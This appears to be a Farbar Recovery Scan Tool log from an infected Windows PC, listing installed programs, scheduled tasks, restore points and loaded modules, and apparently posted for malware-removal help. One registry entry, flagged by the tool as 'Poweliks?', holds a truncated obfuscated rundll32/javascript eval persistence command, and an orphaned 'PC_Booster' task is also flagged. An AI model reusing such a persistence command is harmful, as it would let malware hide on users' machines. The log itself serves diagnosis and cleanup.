C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2011-02-10 11:02

==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-08-2014
Ran by Ice at 2014-08-03 04:11:09
Running from C:\Users\Ice\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 2.6.0.19120 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
Allora and The Broken Portal (HKLM-x32\...\BFG-Allora and The Broken Portal) (Version:  - )
AMD Accelerated Video Transcoding (Version: 13.30.100.40417 - Advanced Micro Devices, Inc.) Hidden
AMD APP SDK Runtime (Version: 10.0.938.1 - Advanced Micro Devices Inc.) Hidden
AMD Catalyst Control Center (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Media Foundation Decoders (Version: 1.0.81206.1620 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.14 - Advanced Micro Devices, Inc.) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.15 - Advanced Micro Devices, Inc.) Hidden
Amulet of Time: Shadow of la Rochelle (HKLM-x32\...\BFG-Amulet of Time - Shadow of la Rochelle) (Version:  - )
Apple Application Support (HKLM-x32\...\{21ECABC3-40B2-42DF-8E21-ACF3A4D0D95A}) (Version: 3.0.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Awakening Kingdoms (HKLM-x32\...\BFG-Awakening Kingdoms) (Version:  - )
Awakening: Moonfell Wood (HKLM-x32\...\BFG-Awakening - Moonfell Wood) (Version:  - )
Awakening: The Dreamless Castle (HKLM-x32\...\BFG-Awakening - The Dreamless Castle) (Version:  - )
Awakening: The Goblin Kingdom (HKLM-x32\...\BFG-Awakening - The Goblin Kingdom) (Version:  - )
Awakening: The Skyward Castle (HKLM-x32\...\BFG-Awakening - The Skyward Castle) (Version:  - )
Awakening: The Sunhook Spire (HKLM-x32\...\BFG-Awakening - The Sunhook Spire) (Version:  - )
Barn Yarn (HKLM-x32\...\BFG-Barn Yarn) (Version:  - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Big Fish: Game Manager (HKLM-x32\...\BFGC) (Version: 3.3.0.2 - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-Lot: Mysteries (HKLM-x32\...\BFG-Build-a-Lot - Mysteries) (Version:  - )
calibre (HKLM-x32\...\{7619F973-52CC-433F-BB71-48E034099BFB}) (Version: 0.9.44 - Kovid Goyal)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Curse at Twilight: Thief of Souls (HKLM-x32\...\BFG-Curse at Twilight - Thief of Souls) (Version:  - )
Curse Client (HKCU\...\101a9f93b8f0bb6f) (Version: 5.1.1.810 - Curse)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dark Manor: A Hidden Object Mystery (HKLM-x32\...\BFG-Dark Manor - A Hidden Object Mystery) (Version:  - )
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell MusicStage (HKLM-x32\...\{91AF2672-F5BC-42CF-8037-A9D2F92BBCC0}) (Version: 1.5.201.0 - Fingertapps)
Dell PhotoStage (HKLM-x32\...\{E4335E82-17B3-460F-9E70-39D9BC269DB3}) (Version: 1.5.0.65 - ArcSoft)
Dell Stage (HKLM-x32\...\{E2EBA7C0-8072-447F-856D-FFEE8D15B23B}) (Version: 1.5.201.0 - Fingertapps)
Dell Support Center (HKLM\...\Dell Support Center) (Version: 3.1.5803.11 - Dell Inc.)
Dell Support Center (Version: 3.1.5803.11 - PC-Doctor, Inc.) Hidden
Dell VideoStage  (HKLM-x32\...\InstallShield_{DCE0E79A-B9AC-41AC-98C1-7EF0538BCA7F}) (Version: 1.2.0.1712 - CyberLink Corp.)
Dell VideoStage  (x32 Version: 1.2.0.1712 - CyberLink Corp.) Hidden
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Dragon Age: Origins (HKLM-x32\...\{AEC81925-9C76-4707-84A9-40696C613ED3}) (Version: 1.05 - Electronic Arts, Inc.)
Fiona Finch and the Finest Flowers (HKLM-x32\...\BFG-Fiona Finch and the Finest Flowers) (Version:  - )
FrostWire 5.6.9 (HKLM-x32\...\FrostWire 5) (Version: 5.6.9.2 - FrostWire LLC)
Gardenscapes (HKLM-x32\...\BFG-Gardenscapes) (Version:  - )
Gardenscapes 2 (HKLM-x32\...\BFG-Gardenscapes 2) (Version:  - )
Gemini Lost (HKLM-x32\...\BFG-Gemini Lost) (Version:  - )
Google Drive (HKLM-x32\...\{75939021-3B68-419D-8DC1-E9823BFF9658}) (Version: 1.16.7009.9618 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Grim Tales: The Legacy (HKLM-x32\...\BFG-Grim Tales - The Legacy) (Version:  - )
Haunted Halls: Green Hills Sanitarium (HKLM-x32\...\BFG-Haunted Halls - Green Hills Sanitarium) (Version:  - )
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Internet Explorer (x32 Version: 8 - Microsoft Corporation) Hidden
iTunes (HKLM\...\{33E28B58-7BA0-47B7-AA01-9225ABA2B8A9}) (Version: 11.3.0.54 - Apple Inc.)
Jasc Paint Shop Pro 8 Dell Edition (HKLM-x32\...\{81A34902-9D0B-4920-A25C-4CDC5D14B328}) (Version: 8.10.0000 - Jasc Software Inc)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.600 - Oracle)
Java Auto Updater (x32 Version: 2.1.60.19 - Oracle, Inc.) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Magic Encyclopedia: Moon Light (HKLM-x32\...\BFG-Magic Encyclopedia - Moon Light) (Version:  - )
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (Version: 4.5.50709 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Moai: Build Your Dream (HKLM-x32\...\BFG-Moai - Build Your Dream) (Version:  - )
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
Mumble 1.2.4 (HKLM-x32\...\{E0955568-4353-4C85-8988-285A8C0F5E87}) (Version: 1.2.4 - Thorvald Natvig)
Northern Tale (HKLM-x32\...\BFG-Northern Tale) (Version:  - )
NVIDIA PhysX (HKLM-x32\...\{1C4551A6-4743-4093-91E4-1477CD655043}) (Version: 9.09.0203 - NVIDIA Corporation)
Plantasia (HKLM-x32\...\BFG-Plantasia) (Version:  - )
Plants vs. Zombies (HKLM-x32\...\BFG-Plants vs Zombies) (Version:  - )
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Ranch Rush (HKLM-x32\...\BFG-Ranch Rush) (Version:  - )
Ranch Rush 2 - Sara's Island Experiment (HKLM-x32\...\BFG-Ranch Rush 2 - Sara's Island Experiment) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6050 - Realtek Semiconductor Corp.)
Royal Envoy (HKLM-x32\...\BFG-Royal Envoy) (Version:  - )
Royal Envoy 2 (HKLM-x32\...\BFG-Royal Envoy 2) (Version:  - )
Royal Envoy 3 (HKLM-x32\...\BFG-Royal Envoy 3) (Version:  - )
Royal Envoy: Campaign for the Crown Collector's Edition (HKLM-x32\...\BFG-Royal Envoy - Campaign for the Crown Collectors Edition) (Version:  - )
Shaolin Mystery: Revenge of the Terracotta Warriors (HKLM-x32\...\BFG-Shaolin Mystery - Revenge of the Terracotta Warriors) (Version:  - )
Shaolin Mystery: Tale of the Jade Dragon Staff (HKLM-x32\...\BFG-Shaolin Mystery - Tale of the Jade Dragon Staff) (Version:  - )
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
Slingo Supreme (HKLM-x32\...\BFG-Slingo Supreme) (Version:  - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
The Fall Trilogy: Chapter 1 (HKLM-x32\...\BFG-The Fall Trilogy - Chapter 1) (Version:  - )
The Fifth Gate (HKLM-x32\...\BFG-The Fifth Gate) (Version:  - )
THX TruStudio PC (HKLM-x32\...\{010A785B-F920-4350-821B-6309909C20BB}) (Version: 1.0 - Creative Technology Limited)
Turbo Subs (HKLM-x32\...\BFG-Turbo Subs) (Version:  - )
Ventrilo Client for Windows x64 (HKLM\...\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}) (Version: 3.0.8.0 - Flagship Industries, Inc.)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Wandering Willows (HKLM-x32\...\BFG-Wandering Willows) (Version:  - )
Warcraft III (HKLM-x32\...\Warcraft III) (Version:  - )
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Zellians: Kingdom Builder ™ (HKLM-x32\...\BFG-World of Zellians - Kingdom Builder) (Version:  - )
Youda Sushi Chef (HKLM-x32\...\BFG-Youda Sushi Chef) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{3a66d1eb-fd23-4e9b-9d6d-64465d8ce9d6}\InprocServer32 -> C:\Windows\system32\dfshim.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

27-07-2014 01:02:40 Removed Compatibility Pack for the 2007 Office system
27-07-2014 01:07:23 Removed Microsoft Office Click-to-Run 2010
27-07-2014 01:08:06 Removed Microsoft Office 2010
27-07-2014 01:09:27 Removed Microsoft Office XP Media Content
02-08-2014 21:52:50 AA11
03-08-2014 01:15:47 Checkpoint by HitmanPro
03-08-2014 01:17:08 Checkpoint by HitmanPro
03-08-2014 02:51:39 Checkpoint by HitmanPro
03-08-2014 08:14:12 AA11

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {148CD901-CD13-4690-A561-B9C2C92F64ED} - System32\Tasks\PCDEventLauncher => C:\Program Files\Dell Support Center\sessionchecker.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {16F02DF3-F1AD-4A10-B1AA-1158CC858452} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {36C40F93-B95C-4009-9688-D97C7CF7C615} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell Support Center\uaclauncher.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {6D03F4D1-4A0D-4A70-9F2E-DC6D23186A6E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {73A6AD3E-4209-42AF-AF6C-B71602B2925F} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\Dell Support Center\pcdrcui.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {B7155BF7-F804-4338-93D4-17105E8F6FA2} - \PC_Booster-S-493389286 No Task File <==== ATTENTION
Task: {DDCB6595-01EB-4492-88AC-CD0535B7AF92} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\Dell Support Center\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\Dell Support Center\pcdrcui.exe

==================== Loaded Modules (whitelisted) =============

2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00098816 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32api.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00110080 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pywintypes27.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00364544 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pythoncom27.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00045568 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_socket.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01160704 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_ssl.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00320512 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32com.shell.shell.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00713216 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_hashlib.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01175040 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._core_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00805888 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._gdi_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00811008 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._windows_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01062400 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._controls_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00735232 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._misc_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00128512 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_elementtree.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00127488 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pyexpat.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00557056 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pysqlite2._sqlite.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00007168 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\hashobjs_ext.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00087552 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_ctypes.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00119808 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32file.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00108544 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32security.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00018432 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32event.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00038912 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32inet.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00070656 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._html2.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00167936 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32gui.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00011264 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32crypt.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00027136 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_multiprocessing.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00122368 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._wizard.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00010240 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\select.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00024064 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32pipe.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00686080 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\unicodedata.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00025600 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32pdh.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00525640 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\windows._lib_cacheinvalidation.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00035840 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32process.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00017408 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32profile.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00022528 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32ts.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00078336 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._animate.pyd
2014-07-22 16:24 - 2014-07-22 16:25 - 03800688 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
